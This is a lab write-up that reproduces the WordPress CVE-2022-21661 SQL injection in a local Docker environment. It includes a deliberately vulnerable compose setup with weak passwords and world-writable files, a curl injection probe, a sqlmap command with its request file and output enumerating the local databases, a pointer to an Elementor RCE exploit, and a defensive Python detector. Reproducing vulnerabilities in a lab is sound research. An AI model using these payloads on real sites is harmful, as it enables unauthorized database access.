cd /tmp;
git clone https://github.com/WellingtonEspindula/SSI-CVE-2022-21661/
apt install -y docker-compose &
docker pull mysql:5.7 ;docker pull wordpress:5.8.1 ; docker pull wordpress:cli;

root@ip-10-0-13-26:/tmp/SSI-CVE-2022-21661# dpkg -l | grep docker-compose
ii docker-compose 1.29.2-1 all define and run multi-container Docker applications with YAML
root@ip-10-0-13-26:/tmp/SSI-CVE-2022-21661#
Customized docker-compose.yml; the modified copy is named Gdocker-compose.yml:

version: "3.3"
services:
  db:
    image: mysql:5.7
    volumes:
      - db_data:/var/lib/mysql
    ports:
      - 33060:3306
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: somewordpress
      MYSQL_DATABASE: wordpress
      MYSQL_USER: wordpress
      MYSQL_PASSWORD: wordpress
    healthcheck:
      # $$ keeps the variables for the container shell; a single $ would be
      # interpolated by docker-compose from the host environment (empty here)
      test: mysqladmin ping -h 127.0.0.1 -u $$MYSQL_USER --password=$$MYSQL_PASSWORD
      start_period: 5s
      interval: 5s
      timeout: 5s
      retries: 55
  wordpress:
    depends_on:
      db:
        condition: service_healthy
    image: wordpress:5.8.1
    ports:
      - 8000:80
    restart: always
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_NAME: wordpress
      WORDPRESS_DB_USER: wordpress
      WORDPRESS_DB_PASSWORD: wordpress
      WORDPRESS_TABLE_PREFIX: "wp_"
      WORDPRESS_DEBUG: 1
    volumes:
      - wp_data:/var/www/html
  wordpress-cli:
    depends_on:
      - db
      - wordpress
    image: wordpress:cli
    user: root
    stdin_open: true
    tty: true
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_NAME: wordpress
      WORDPRESS_DB_USER: wordpress
      WORDPRESS_DB_PASSWORD: wordpress
    # folded scalar: the lines below are joined with spaces into one sh -c string
    command: >
      /bin/sh -c 'id;cat /etc/hosts;ip add;sleep 3;
      wp --allow-root core install --url="http://127.0.0.1:8000" --title="CVE2022-21661" --admin_user=admin --admin_password=admin --admin_email=foo@bar.com;
      wp --allow-root plugin install elementor --version=3.5.0 --activate;
      wp --allow-root plugin install ele-custom-skin --version=3.1.3 --activate;
      wp --allow-root theme install hello-elementor --version=2.5.0 --activate;
      wp --allow-root user create tom tom@tom.com --user_pass="weakpassword";
      wp --allow-root user create leo leo@leo.com --user_pass="strongpassword";
      wp --allow-root user create bassam bassam@bassam.com --user_pass="pinto99";
      chown -R 33:33 /var/www/html;
      chmod -R 0777 /var/www/html;
      cat /etc/passwd;
      wp config set WP_DEBUG true --raw --allow-root;
      wp config set WP_DEBUG_LOG true --raw --allow-root;
      wp config set WP_DEBUG_LOG "/var/www/html/aab.log" --allow-root;
      wp config set WP_DEBUG_DISPLAY true --raw --allow-root;
      bash;'
    volumes:
      - wp_data:/var/www/html
volumes:
  db_data:
  wp_data:
wp --allow-root plugin install elementor --version=3.6.2 --activate;
Version 3.6.2 also works, and it carries its own vulnerability, so the two can be tested together:
#https://www.exploit-db.com/exploits/50882
#WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)
Start the three containers:
docker-compose -f /tmp/SSI-CVE-2022-21661/Gdocker-compose.yml up -d
Watch the logs:
docker logs -f ssi-cve-2022-21661_wordpress-cli_1 ;
Test the connection to the mysql container:
docker exec -it ssi-cve-2022-21661_db_1 bash
mysql -h 127.0.0.1 -u wordpress --password=wordpress -e "select now();"
SQL injection test with curl (reference: SSI-CVE-2022-21661/example.md at master · WellingtonEspindula/SSI-CVE-2022-21661 · GitHub):

curl -x http://127.0.0.1:8080/ -i --compressed -k -X $'POST' \
-H $'Host: 127.0.0.1:8000' -H $'User-Agent: python-requests/2.28.1' -H $'Accept-Encoding: gzip, deflate, br' -H $'Accept: */*' -H $'Connection: keep-alive' -H $'Content-Length: 287' -H $'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'action=ecsload&query=%7b%22tax_query%22%3a%7b%220%22%3a%7b%22field%22%3a%22term_taxonomy_id%22%2c%22terms%22%3a%5b%22%22%5d%7d%7d%7d&ecs_ajax_settings=%7b%22post_id%22%3a%221%22%2c%20%22current_page%22%3a1%2c%20%22widget_id%22%3a1%2c%20%22theme_id%22%3a1%2c%20%22max_num_pages%22%3a10%7d' \
$'http://127.0.0.1:8000/wp-admin/admin-ajax.php'

http://127.0.0.1:8080/ is the HTTP proxy started by Burp Suite 2022, which makes the traffic easy to observe.

Bring out the big gun, sqlmap:

set cmdpath2024=c:\Python310\python
%cmdpath2024% E:\BaiduNetdiskDownload\sqlmapproject-sqlmap-796173f\sqlmap.py -vvv -r ./rr2024.txt --dbms=mysql --technique=E --prefix="23) " --suffix="#" --threads=4 --current-db --is-dba --dbs --proxy=http://127.0.0.1:8080
# sqlmap {1.6.2.4#dev}, supports python3.10

rr2024.txt is as follows:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: curl/7.87.0
Accept: */*
Content-Length: 131
Content-Type: application/x-www-form-urlencoded
Connection: close

action=ecsload&query={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["1*"]}}}&ecs_ajax_settings={"post_id":"1", "current_page":1, "widget_id":1, "theme_id":1, "max_num_pages":10}

Result:
web server operating system: Linux Debian
web application technology: PHP 7.4.25, Apache 2.4.51
back-end DBMS: MySQL >= 5.1
[18:49:47] [INFO] fetching current database
[18:49:49] [INFO] retrieved: 'wordpress'
current database: 'wordpress'
[18:49:49] [INFO] testing if current user is DBA
[18:49:49] [INFO] fetching current user
[18:49:51] [INFO] retrieved: 'wordpress@%'
current user is DBA: False
[18:49:52] [INFO] fetching database names
[18:49:56] [INFO] retrieved: 'information_schema'
[18:49:56] [INFO] retrieved: 'wordpress'
[18:49:56] [DEBUG] performed 3 queries in 3.61 seconds
available databases [2]:
[*] information_schema
[*] wordpress
Other supporting references:

https://github.com/daniel616/CVE-2022-21661-Demo
#wp --allow-root theme install https://downloads.wordpress.org/theme/hello-elementor.3.1.1.zip --activate
#wp --allow-root theme install /path/to/hello-elementor.3.1.1.zip --activate
#https://raw.githubusercontent.com/elementor/elementor/main/changelog.txt
# curl https://api.wordpress.org/plugins/info/1.0/elementor.json
#https://downloads.wordpress.org/plugin/elementor.3.25.1.zip
#https://downloads.wordpress.org/plugin/elementor.3.6.2.zip
#https://downloads.wordpress.org/plugin/elementor.3.11.0.zip
cd /tmp&&curl -vk4O https://downloads.wordpress.org/theme/hello-elementor.2.1.0.zip
cd /tmp&&curl -vk4O https://downloads.wordpress.org/theme/hello-elementor.2.5.0.zip
cd /tmp&&curl -vk4O https://downloads.wordpress.org/theme/hello-elementor.2.7.0.zip
https://forum.butian.net/share/1324

Vulnerability overview

This is a recently disclosed SQL injection vulnerability in WordPress. It is not a hole that can be exploited directly on its own; it is a flaw in WP_Query, a WordPress core function that plugins use all the time, so the potential damage is considerable, and it can be reached from the front end as well as the admin back end.
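As an added defensive example (not code from this page, from the SSI-CVE-2022-21661 repository, or from WordPress): the Python below takes a POST body of the kind shown in the curl command and rr2024.txt above, pulls the query parameter out, walks the tax_query tree the way WP_Tax_Query nests clauses, and lists every term_taxonomy_id term that is not a plain integer, since those are the values that reached the SQL unsanitised in vulnerable versions. It also carries a sanitizer that casts such terms to integers, which is the shape of the WordPress 5.8.3 fix (assumption: upstream applies intval to these terms; the PHP intval emulation here is my own approximation). The sample bodies are constructed; the first reuses the url-encoded body from the curl command above, the function names are assumptions.

```python
import json
import re
from urllib.parse import parse_qs

# Constructed sample POST bodies for /wp-admin/admin-ajax.php (not captured traffic).
# "page_curl_probe" is the url-encoded body from the curl command on this page;
# the others follow the shape of the rr2024.txt request.
SAMPLE_BODIES = {
    "page_curl_probe": (
        "action=ecsload&query=%7b%22tax_query%22%3a%7b%220%22%3a%7b%22field%22%3a"
        "%22term_taxonomy_id%22%2c%22terms%22%3a%5b%22%22%5d%7d%7d%7d"
        "&ecs_ajax_settings=%7b%22post_id%22%3a%221%22%7d"
    ),
    "page_marker": 'action=ecsload&query={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["1*"]}}}&ecs_ajax_settings={}',
    "benign": 'action=ecsload&query={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["1","2"]}}}&ecs_ajax_settings={}',
    "nested": ('action=ecsload&query={"tax_query":{"relation":"AND",'
               '"0":{"field":"term_id","terms":["x"]},'
               '"1":{"relation":"OR","0":{"field":"term_taxonomy_id","terms":[7,"9 abc"]}}}}'),
}

INT_RE = re.compile(r"^-?\d+$")


def parse_ecsload_query(body):
    """Return the decoded `query` dict of an ecsload request, or None when the
    body is not an ecsload request or its query is not a JSON object."""
    params = parse_qs(body, keep_blank_values=True)
    if params.get("action", [""])[0] != "ecsload":
        return None
    try:
        query = json.loads(params.get("query", [""])[0])
    except json.JSONDecodeError:
        return None
    return query if isinstance(query, dict) else None


def iter_tax_clauses(node):
    """Yield every leaf clause of a WP_Tax_Query-style tree (a dict with 'terms').
    Any other dict under a key other than 'relation' is a nested clause group."""
    if not isinstance(node, dict):
        return
    if "terms" in node:
        yield node
        return
    for key, value in node.items():
        if key != "relation":
            yield from iter_tax_clauses(value)


def is_int_literal(value):
    """True for ints and for strings that contain nothing but an integer."""
    if isinstance(value, bool):
        return False
    if isinstance(value, int):
        return True
    return isinstance(value, str) and INT_RE.match(value) is not None


def find_unsafe_terms(body):
    """List every term_taxonomy_id term that is not a plain integer; only that
    field takes the term_taxonomy_id branch where the injection happened."""
    query = parse_ecsload_query(body)
    if query is None:
        return []
    unsafe = []
    for clause in iter_tax_clauses(query.get("tax_query", {})):
        if clause.get("field", "term_id") != "term_taxonomy_id":
            continue
        terms = clause["terms"]
        if not isinstance(terms, list):
            terms = [terms]
        unsafe.extend(t for t in terms if not is_int_literal(t))
    return unsafe


def php_intval(value):
    """Approximation (assumed) of PHP intval() for the scalars seen here:
    the leading integer of the string, or 0 when there is none."""
    if isinstance(value, bool):
        return int(value)
    if isinstance(value, int):
        return value
    match = re.match(r"^\s*([+-]?\d+)", str(value))
    return int(match.group(1)) if match else 0


def sanitize_tax_query(node):
    """Return a copy of the tree with term_taxonomy_id terms cast to int,
    the shape of the 5.8.3 fix (assumption: upstream uses intval here)."""
    if not isinstance(node, dict):
        return node
    out = {}
    for key, value in node.items():
        if key == "terms" and node.get("field", "term_id") == "term_taxonomy_id":
            terms = value if isinstance(value, list) else [value]
            out[key] = [php_intval(t) for t in terms]
        else:
            out[key] = sanitize_tax_query(value)
    return out


if __name__ == "__main__":
    for name, body in SAMPLE_BODIES.items():
        print(f"{name:16s} unsafe terms: {find_unsafe_terms(body)}")
```

Run as a script it reports the flagged terms for each sample body; the same find_unsafe_terms check can be pointed at a WAF log or a proxy capture of admin-ajax.php requests, where any non-empty result is the signal that a request is probing this code path rather than loading a widget.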